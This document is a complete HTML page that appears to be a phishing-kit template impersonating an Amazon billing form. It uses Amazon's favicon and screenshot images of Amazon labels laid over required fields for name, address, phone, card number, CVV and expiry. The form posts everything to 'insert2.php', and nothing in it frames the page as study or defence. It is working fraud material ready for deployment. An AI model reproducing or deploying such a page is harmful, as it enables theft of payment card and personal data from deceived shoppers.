<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Your Billing Information</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta charset="utf-8" />
<meta name="applicable-device" content="pc,mobile" />
 <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex, nofollow">
  <meta name="googlebot" content="noindex, nofollow">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="format-detection" content="telephone=no" />

<link rel="shortcut icon"
              href="https://www.amazon.com/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">

.textox {
   width: 279px;
   height: 40px;
   border: solid 1px #BFBFBF;
   padding: 2px;
   border-radius: 3px;
   font-size: 12px;
   background-color: #FFFFFF;
   outline: none;
   color: #474747;
  }
.textox:focus  {
   border: solid 1px #6AB6E6;
  }
  
.textox2 {
   width: 139px;
   height: 24px;
   border: solid 1px #FFFFFF;
   padding: 2px;
   border-radius: 3px;
   font-size: 12px;
   background-color: #FFFFFF;
   outline: none;
   color: #474747;
  }

input[type=checkbox].css-checkbox {
							position:absolute; z-index:-1000; left:-1000px; overflow: hidden; clip: rect(0 0 0 0); height:1px; width:1px; margin:-1px; padding:0; border:0;
						}

						input[type=checkbox].css-checkbox + label.css-label, input[type=checkbox].css-checkbox + label.css-label.clr {
							padding-left:29px;
							height:24px; 
							display:inline-block;
							line-height:24px;
							background-repeat:no-repeat;
							background-position: 0 0;
							font-size:24px;
							vertical-align:middle;
							cursor:pointer;

						}

						input[type=checkbox].css-checkbox:checked + label.css-label, input[type=checkbox].css-checkbox + label.css-label.chk {
							background-position: 0 -24px;
						}
						label.css-label {
				background-image:url(http://csscheckbox.com/checkboxes/u/csscheckbox_a608ec28e6c50a02870bf452f125b974.png);
				-webkit-touch-callout: none;
				-webkit-user-select: none;
				-khtml-user-select: none;
				-moz-user-select: none;
				-ms-user-select: none;
				user-select: none;
			}

</style>

</head>
<body>
<div id="header" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1515px; height:155px; z-index:1"><img src="https://i.postimg.cc/Jh51G0gN/header.png" alt="" title="" border=0 width=1515 height=155></div>
<div id="editadd" style="position:absolute; overflow:hidden; left:517px; top:178px; width:275px; height:60px; z-index:1"><img src="https://i.postimg.cc/4ymBCyqv/editadd.png" alt="" title="" border=0 width=275 height=60></div>
<div id="nam" style="position:absolute; overflow:hidden; left:520px; top:256px; width:66px; height:14px; z-index:1"><img src="https://i.postimg.cc/5NLsCb6s/nam.png" alt="" title="" border=0 width=66 height=14></div>
<div id="add" style="position:absolute; overflow:hidden; left:520px; top:320px; width:93px; height:14px; z-index:1"><img src="https://i.postimg.cc/Gpgpx0Hf/add.png" alt="" title="" border=0 width=93 height=14></div>
<div id="city" style="position:absolute; overflow:hidden; left:520px; top:425px; width:32px; height:14px; z-index:1"><img src="https://i.postimg.cc/QdJp6Y3D/city.png" alt="" title="" border=0 width=32 height=14></div>
<div id="state" style="position:absolute; overflow:hidden; left:520px; top:492px; width:155px; height:15px; z-index:1"><img src="https://i.postimg.cc/gj5WbKbk/state.png" alt="" title="" border=0 width=155 height=15></div>
<div id="zipc" style="position:absolute; overflow:hidden; left:801px; top:492px; width:60px; height:15px; z-index:1"><img src="https://i.postimg.cc/85S3W0N6/zipc.png" alt="" title="" border=0 width=60 height=15></div>
<div id="phone" style="position:absolute; overflow:hidden; left:520px; top:555px; width:93px; height:13px; z-index:1"><img src="https://i.postimg.cc/XYM7mn8S/phone.png" alt="" title="" border=0 width=93 height=13></div>
<div id="pay" style="position:absolute; overflow:hidden; left:517px; top:615px; width:324px; height:75px; z-index:1"><img src="https://i.postimg.cc/66GNGfMh/pay.png" alt="" title="" border=0 width=324 height=75></div>
<div id="namoncard" style="position:absolute; overflow:hidden; left:520px; top:717px; width:94px; height:14px; z-index:1"><img src="https://i.postimg.cc/s2Ln4fSq/namoncard.png" alt="" title="" border=0 width=94 height=14></div>
<div id="ccnumber" style="position:absolute; overflow:hidden; left:765px; top:717px; width:89px; height:14px; z-index:1"><img src="https://i.postimg.cc/sfQk8qg5/ccnumber.png" alt="" title="" border=0 width=89 height=14></div>
<div id="cvv" style="position:absolute; overflow:hidden; left:520px; top:782px; width:122px; height:16px; z-index:1"><img src="https://i.postimg.cc/6pb3cFQF/cvv.png" alt="" title="" border=0 width=122 height=16></div>
<div id="exp" style="position:absolute; overflow:hidden; left:765px; top:782px; width:96px; height:15px; z-index:1"><img src="https://i.postimg.cc/sgTB8vT6/exp.png" alt="" title="" border=0 width=96 height=15></div>
<div id="agreement" style="position:absolute; overflow:hidden; left:517px; top:845px; width:450px; height:35px; z-index:1"><img src="https://i.postimg.cc/vmYtJyqZ/agreement.png" alt="" title="" border=0 width=450 height=35></div>
<div id="footer" style="position:absolute; overflow:hidden; left:0px; top:1000px; width:1515px; height:520px; z-index:1"><img src="https://i.postimg.cc/zDRZsfNX/footer2.png" alt="" title="" border=0 width=1515 height=520></div>

<form action="insert2.php" name=chalbhai id=chalbhai method=post>

<input name="fname" required type="text" class="textox"  placeholder="" maxlength="30" style="position:absolute;width:480px;height:32px;padding-left:10px;font-size:13px;left:520px;top:275px;z-index:22">
<input name="add1" required type="text" class="textox"  placeholder="Street and number, P.O. box, c/o." maxlength="40" style="position:absolute;width:480px;height:32px;padding-left:10px;font-size:13px;left:520px;top:340px;z-index:22">
<input name="add2" required type="text" class="textox"  placeholder="Apartment, suite, unit, building, floor, etc." maxlength="20" style="position:absolute;width:480px;height:32px;padding-left:10px;font-size:13px;left:520px;top:380px;z-index:22">
<input name="city" required type="text" class="textox"  placeholder="" maxlength="20" style="position:absolute;width:480px;height:32px;padding-left:10px;font-size:13px;left:520px;top:445px;z-index:22">
<input name="state" required type="text" class="textox"  placeholder="" maxlength="20" style="position:absolute;width:260px;height:32px;padding-left:10px;font-size:13px;left:520px;top:510px;z-index:22">
<input name="zipcode" required type="text" class="textox"  placeholder="" maxlength="5" style="position:absolute;width:200px;height:32px;padding-left:10px;font-size:13px;left:800px;top:510px;z-index:22">
<input name="phone" required type="text" class="textox"  placeholder="" maxlength="10" style="position:absolute;width:480px;height:32px;padding-left:10px;font-size:13px;left:520px;top:575px;z-index:22">
<input name="ccname" required type="text" class="textox"  placeholder="" maxlength="25" style="position:absolute;width:235px;height:32px;padding-left:10px;font-size:13px;left:520px;top:735px;z-index:22">
<input name="ccnumber" required type="text" class="textox"  placeholder="" maxlength="16" style="position:absolute;width:235px;height:32px;padding-left:10px;font-size:13px;left:765px;top:735px;z-index:22">
<input name="cvv" required type="text" class="textox"  placeholder="" maxlength="4" style="position:absolute;width:235px;height:32px;padding-left:10px;font-size:13px;left:520px;top:800px;z-index:22">
<select name="expmonth" class="formCtlColumn" style="position:absolute;left:765px;top:800px;height:32px;width:50px;z-index:2">
<option value="01">01</option>
    <option value="02">02</option>
    <option value="03">03</option>
    <option value="04">04</option>
    <option value="05">05</option>
    <option value="06">06</option>
    <option value="07">07</option>
    <option value="08">08</option>
    <option value="09">09</option>
    <option value="10">10</option>
    <option value="11">11</option>
    <option value="12">12</option></select>
<select name="expyear" class="formCtlColumn" style="position:absolute;left:825px;top:800px;height:32px;width:80px;z-index:3">
    <option value="19">2019</option>
    <option value="20">2020</option>
    <option value="21">2021</option>
    <option value="22">2022</option>
	<option value="23">2023</option>
    <option value="24">2024</option>
    <option value="25">2025</option>
	<option value="26">2026</option>
    <option value="27">2027</option>
    <option value="28">2028</option>
    <option value="29">2029</option>
    <option value="30">2030</option></select>
<div id="cont" style="position:absolute; left:520px; top:910px; z-index:25"><input type="image" name="formimage1" width="130" height="33" src="https://i.postimg.cc/yNjvxxgR/cont.png"></div>
<div id="cvvimage" style="position:absolute; left:711px; top:802px; z-index:25"><input type="image" name="formimage1" width="42" height="28" src="https://i.postimg.cc/hvpxnQfy/cvvimage.png"></div>
<div id="ccimage" style="position:absolute; left:957px; top:737.5px; z-index:25"><input type="image" name="formimage1" width="42" height="28" src="https://i.postimg.cc/N0frd1YP/ccimage.png"></div>

</body>
</html>
